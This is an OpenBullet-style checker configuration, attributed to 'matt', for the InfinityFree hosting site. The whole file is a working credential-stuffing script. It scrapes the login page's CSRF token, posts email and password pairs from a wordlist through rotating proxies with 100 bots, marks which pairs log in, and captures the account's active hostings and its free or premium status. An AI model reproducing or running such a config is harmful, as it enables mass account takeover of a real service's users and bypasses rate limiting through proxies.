[SETTINGS]
{
  "Name": "InfinityFree by matt",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2019-06-25T16:02:56.8404114+02:00",
  "AdditionalInfo": "",
  "Author": "matt",
  "Version": "1.3.2 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://app.infinityfree.net/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Token PARSE "<SOURCE>" LR "name=\"_token\" value=\"" "\">" -> VAR "TOKEN" 

#Login REQUEST POST "https://app.infinityfree.net/login" 
  CONTENT "email=<USER>&password=<PASS>&_token=<TOKEN>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Check KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Active Accounts" 
  KEYCHAIN Failure OR 
    KEY "These credentials do not match our records." 

#Active_Hostings PARSE "<SOURCE>" LR "<small>Active Accounts:" "</small>" -> CAP "ACTIVE" 

#Capture REQUEST GET "https://app.infinityfree.net/upgrade" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Check KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Upgrade to Premium Hosting" 
  KEYCHAIN Custom "FREE" OR 
    KEY "<SOURCE>" DoesNotContain "Upgrade to Premium Hosting" 

